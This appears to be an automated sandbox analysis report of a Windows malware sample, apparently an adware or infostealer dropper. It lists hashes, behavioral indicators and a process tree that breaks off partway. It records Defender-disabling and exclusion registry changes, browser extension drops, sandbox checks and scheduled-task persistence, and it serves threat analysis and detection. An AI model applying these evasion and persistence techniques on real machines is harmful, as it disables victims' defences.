Analysis
-
max time kernel
127s -
max time network
132s -
platform
windows7_x64 -
resource
win7-20220901-en -
resource tags
arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system -
submitted
23-11-2022 06:33
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20220901-en
General
-
Target
file.exe
-
Size
7.2MB
-
MD5
b374f37c729ba81d8328173c325af442
-
SHA1
9392040af20e507482bb1b3b4249060107240610
-
SHA256
f4b26d3c7a28964d229a292471dcb8247a1112f19397c57755f5a25e49acd3c1
-
SHA512
15f29d2bb4b244aa33cd066d8900296e284153a1a683979f6a944004fe11443b42f1aa93f6d30a06aa12476a350c7210c25d1feef6aa927cfbcae07e890576fc
-
SSDEEP
196608:91OZI3K3nEkGjraBNvx3RdfjK7ZFwvrfzSEb/W:3ODEkGjraBNx3Rd7K7ZkWEb/W
Malware Config
Signatures
-
Processes:
reg.exereg.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe -
Processes:
reg.exereg.exereg.exereg.exereg.execonhost.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\zjyBtxSiMuSUC = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\jWXQtFKEfMKfhKUF = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths conhost.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\zjyBtxSiMuSUC = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\tpJIuSEupLAEZXYwF = "0" conhost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\InaIvrjBgGxU2 = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\uOKUZcIdbhBstHVB = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\jWXQtFKEfMKfhKUF = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\jWXQtFKEfMKfhKUF = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\GMdDEZUiqAWOMLthmzR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\jWXQtFKEfMKfhKUF = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\GMdDEZUiqAWOMLthmzR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\pGMaoMOmU = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\uOKUZcIdbhBstHVB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\InaIvrjBgGxU2 = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\bNrcflyMMmUn = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\pGMaoMOmU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\bNrcflyMMmUn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\tpJIuSEupLAEZXYwF = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe -
Blocklisted process makes network request 1 IoCs
Processes:
rundll32.exeflow pid process 21 584 rundll32.exe -
Executes dropped EXE 4 IoCs
Processes:
Install.exeInstall.exetMXQfmz.exeUkHfwTp.exepid process 840 Install.exe 948 Install.exe 1604 tMXQfmz.exe 108 UkHfwTp.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
Install.exerundll32.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
UkHfwTp.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Control Panel\International\Geo\Nation UkHfwTp.exe -
Loads dropped DLL 12 IoCs
Processes:
file.exeInstall.exeInstall.exerundll32.exepid process 1364 file.exe 840 Install.exe 840 Install.exe 840 Install.exe 840 Install.exe 948 Install.exe 948 Install.exe 948 Install.exe 584 rundll32.exe 584 rundll32.exe 584 rundll32.exe 584 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 1 IoCs
Processes:
UkHfwTp.exedescription ioc process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json UkHfwTp.exe -
Drops file in System32 directory 19 IoCs
Processes:
powershell.EXEUkHfwTp.exerundll32.exepowershell.EXEtMXQfmz.exeInstall.exepowershell.EXEpowershell.EXEdescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat UkHfwTp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat rundll32.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_4A183155DB502CF599F3A8AD6680B8C3 UkHfwTp.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol tMXQfmz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA UkHfwTp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA UkHfwTp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_DD5E18651A85E635F184F73BE6D3DB70 UkHfwTp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_4A183155DB502CF599F3A8AD6680B8C3 UkHfwTp.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol tMXQfmz.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini tMXQfmz.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol UkHfwTp.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA UkHfwTp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA UkHfwTp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_DD5E18651A85E635F184F73BE6D3DB70 UkHfwTp.exe -
Drops file in Program Files directory 13 IoCs
Processes:
UkHfwTp.exedescription ioc process File created C:\Program Files (x86)\InaIvrjBgGxU2\zVfoHTfndpHqU.dll UkHfwTp.exe File created C:\Program Files (x86)\InaIvrjBgGxU2\QUrAUiT.xml UkHfwTp.exe File created C:\Program Files (x86)\GMdDEZUiqAWOMLthmzR\bHHlqhL.dll UkHfwTp.exe File created C:\Program Files (x86)\pGMaoMOmU\VoTnpq.dll UkHfwTp.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi UkHfwTp.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak UkHfwTp.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja UkHfwTp.exe File created C:\Program Files (x86)\pGMaoMOmU\tIIFAmn.xml UkHfwTp.exe File created C:\Program Files (x86)\GMdDEZUiqAWOMLthmzR\RjQzLHd.xml UkHfwTp.exe File created C:\Program Files (x86)\zjyBtxSiMuSUC\UHjDIAf.dll UkHfwTp.exe File created C:\Program Files (x86)\zjyBtxSiMuSUC\otBKIpL.xml UkHfwTp.exe File created C:\Program Files (x86)\bNrcflyMMmUn\rMcbHKs.dll UkHfwTp.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi UkHfwTp.exe -
Drops file in Windows directory 4 IoCs
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exedescription ioc process File created C:\Windows\Tasks\aClwDgKsxBQnbYjuF.job schtasks.exe File created C:\Windows\Tasks\yKRLlrVxZRCwfvY.job schtasks.exe File created C:\Windows\Tasks\GqChQHaYBumcgGPDT.job schtasks.exe File created C:\Windows\Tasks\bvffOywEAsomCrOclN.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 13 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 1656 schtasks.exe 856 schtasks.exe 1000 schtasks.exe 1640 schtasks.exe 856 schtasks.exe 1324 schtasks.exe 1148 schtasks.exe 2000 schtasks.exe 1888 schtasks.exe 1640 schtasks.exe 1168 schtasks.exe 1996 schtasks.exe 276 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
Processes:
Install.exerundll32.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
UkHfwTp.exerundll32.exewscript.exedescription ioc process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" UkHfwTp.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{427E4C09-48E7-457C-B98B-AAD8DF71B24A}\WpadNetworkName = "Network 2" UkHfwTp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed UkHfwTp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{427E4C09-48E7-457C-B98B-AAD8DF71B24A}\42-3c-f2-12-d9-4c rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix UkHfwTp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates UkHfwTp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs UkHfwTp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates UkHfwTp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\42-3c-f2-12-d9-4c\WpadDecisionReason = "1" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates UkHfwTp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust UkHfwTp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs UkHfwTp.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f000e000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\42-3c-f2-12-d9-4c\WpadDecision = "0" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople UkHfwTp.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{427E4C09-48E7-457C-B98B-AAD8DF71B24A}\WpadDecisionTime = 70bcbfbb05ffd801 UkHfwTp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root UkHfwTp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{427E4C09-48E7-457C-B98B-AAD8DF71B24A} UkHfwTp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\42-3c-f2-12-d9-4c\WpadDecision = "0" UkHfwTp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs UkHfwTp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates UkHfwTp.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\42-3c-f2-12-d9-4c\WpadDetectedUrl rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings UkHfwTp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings UkHfwTp.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 UkHfwTp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs UkHfwTp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople UkHfwTp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates UkHfwTp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs UkHfwTp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA UkHfwTp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs UkHfwTp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs UkHfwTp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs UkHfwTp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing UkHfwTp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs UkHfwTp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot UkHfwTp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs UkHfwTp.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\42-3c-f2-12-d9-4c\WpadDecisionTime = 70bcbfbb05ffd801 rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs UkHfwTp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs UkHfwTp.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" UkHfwTp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{427E4C09-48E7-457C-B98B-AAD8DF71B24A}\WpadDecisionReason = "1" UkHfwTp.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\42-3c-f2-12-d9-4c\WpadDecisionTime = 70bcbfbb05ffd801 UkHfwTp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA UkHfwTp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs UkHfwTp.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 UkHfwTp.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad UkHfwTp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections UkHfwTp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates UkHfwTp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs UkHfwTp.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing wscript.exe -
Suspicious behavior: EnumeratesProcesses 28 IoCs
Processes:
powershell.EXEpowershell.EXEpowershell.EXEpowershell.EXEUkHfwTp.exepid process 1388 powershell.EXE 1388 powershell.EXE 1388 powershell.EXE 1328 powershell.EXE 1328 powershell.EXE 1328 powershell.EXE 1464 powershell.EXE 1464 powershell.EXE 1464 powershell.EXE 1056 powershell.EXE 1056 powershell.EXE 1056 powershell.EXE 108 UkHfwTp.exe 108 UkHfwTp.exe 108 UkHfwTp.exe 108 UkHfwTp.exe 108 UkHfwTp.exe 108 UkHfwTp.exe 108 UkHfwTp.exe 108 UkHfwTp.exe 108 UkHfwTp.exe 108 UkHfwTp.exe 108 UkHfwTp.exe 108 UkHfwTp.exe 108 UkHfwTp.exe 108 UkHfwTp.exe 108 UkHfwTp.exe 108 UkHfwTp.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
powershell.EXEpowershell.EXEpowershell.EXEpowershell.EXEdescription pid process Token: SeDebugPrivilege 1388 powershell.EXE Token: SeDebugPrivilege 1328 powershell.EXE Token: SeDebugPrivilege 1464 powershell.EXE Token: SeDebugPrivilege 1056 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
file.exeInstall.exeInstall.exeforfiles.exeforfiles.execmd.execmd.exedescription pid process target process PID 1364 wrote to memory of 840 1364 file.exe Install.exe PID 1364 wrote to memory of 840 1364 file.exe Install.exe PID 1364 wrote to memory of 840 1364 file.exe Install.exe PID 1364 wrote to memory of 840 1364 file.exe Install.exe PID 1364 wrote to memory of 840 1364 file.exe Install.exe PID 1364 wrote to memory of 840 1364 file.exe Install.exe PID 1364 wrote to memory of 840 1364 file.exe Install.exe PID 840 wrote to memory of 948 840 Install.exe Install.exe PID 840 wrote to memory of 948 840 Install.exe Install.exe PID 840 wrote to memory of 948 840 Install.exe Install.exe PID 840 wrote to memory of 948 840 Install.exe Install.exe PID 840 wrote to memory of 948 840 Install.exe Install.exe PID 840 wrote to memory of 948 840 Install.exe Install.exe PID 840 wrote to memory of 948 840 Install.exe Install.exe PID 948 wrote to memory of 1064 948 Install.exe forfiles.exe PID 948 wrote to memory of 1064 948 Install.exe forfiles.exe PID 948 wrote to memory of 1064 948 Install.exe forfiles.exe PID 948 wrote to memory of 1064 948 Install.exe forfiles.exe PID 948 wrote to memory of 1064 948 Install.exe forfiles.exe PID 948 wrote to memory of 1064 948 Install.exe forfiles.exe PID 948 wrote to memory of 1064 948 Install.exe forfiles.exe PID 948 wrote to memory of 624 948 Install.exe forfiles.exe PID 948 wrote to memory of 624 948 Install.exe forfiles.exe PID 948 wrote to memory of 624 948 Install.exe forfiles.exe PID 948 wrote to memory of 624 948 Install.exe forfiles.exe PID 948 wrote to memory of 624 948 Install.exe forfiles.exe PID 948 wrote to memory of 624 948 Install.exe forfiles.exe PID 948 wrote to memory of 624 948 Install.exe forfiles.exe PID 1064 wrote to memory of 2044 1064 forfiles.exe cmd.exe PID 1064 wrote to memory of 2044 1064 forfiles.exe cmd.exe PID 1064 wrote to memory of 2044 1064 forfiles.exe cmd.exe PID 1064 wrote to memory of 2044 1064 forfiles.exe cmd.exe PID 1064 wrote to memory of 2044 1064 forfiles.exe cmd.exe PID 1064 wrote to memory of 2044 1064 forfiles.exe cmd.exe PID 1064 wrote to memory of 2044 1064 forfiles.exe cmd.exe PID 624 wrote to memory of 1324 624 forfiles.exe cmd.exe PID 624 wrote to memory of 1324 624 forfiles.exe cmd.exe PID 624 wrote to memory of 1324 624 forfiles.exe cmd.exe PID 624 wrote to memory of 1324 624 forfiles.exe cmd.exe PID 624 wrote to memory of 1324 624 forfiles.exe cmd.exe PID 624 wrote to memory of 1324 624 forfiles.exe cmd.exe PID 624 wrote to memory of 1324 624 forfiles.exe cmd.exe PID 1324 wrote to memory of 1548 1324 cmd.exe reg.exe PID 1324 wrote to memory of 1548 1324 cmd.exe reg.exe PID 1324 wrote to memory of 1548 1324 cmd.exe reg.exe PID 1324 wrote to memory of 1548 1324 cmd.exe reg.exe PID 1324 wrote to memory of 1548 1324 cmd.exe reg.exe PID 1324 wrote to memory of 1548 1324 cmd.exe reg.exe PID 1324 wrote to memory of 1548 1324 cmd.exe reg.exe PID 2044 wrote to memory of 1360 2044 cmd.exe reg.exe PID 2044 wrote to memory of 1360 2044 cmd.exe reg.exe PID 2044 wrote to memory of 1360 2044 cmd.exe reg.exe PID 2044 wrote to memory of 1360 2044 cmd.exe reg.exe PID 2044 wrote to memory of 1360 2044 cmd.exe reg.exe PID 2044 wrote to memory of 1360 2044 cmd.exe reg.exe PID 2044 wrote to memory of 1360 2044 cmd.exe reg.exe PID 1324 wrote to memory of 1092 1324 cmd.exe reg.exe PID 1324 wrote to memory of 1092 1324 cmd.exe reg.exe PID 1324 wrote to memory of 1092 1324 cmd.exe reg.exe PID 1324 wrote to memory of 1092 1324 cmd.exe reg.exe PID 1324 wrote to memory of 1092 1324 cmd.exe reg.exe PID 1324 wrote to memory of 1092 1324 cmd.exe reg.exe PID 1324 wrote to memory of 1092 1324 cmd.exe reg.exe PID 2044 wrote to memory of 1672 2044 cmd.exe reg.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1364 -
C:\Users\Admin\AppData\Local\Temp\7zS3313.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:840 -
C:\Users\Admin\AppData\Local\Temp\7zS38AE.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
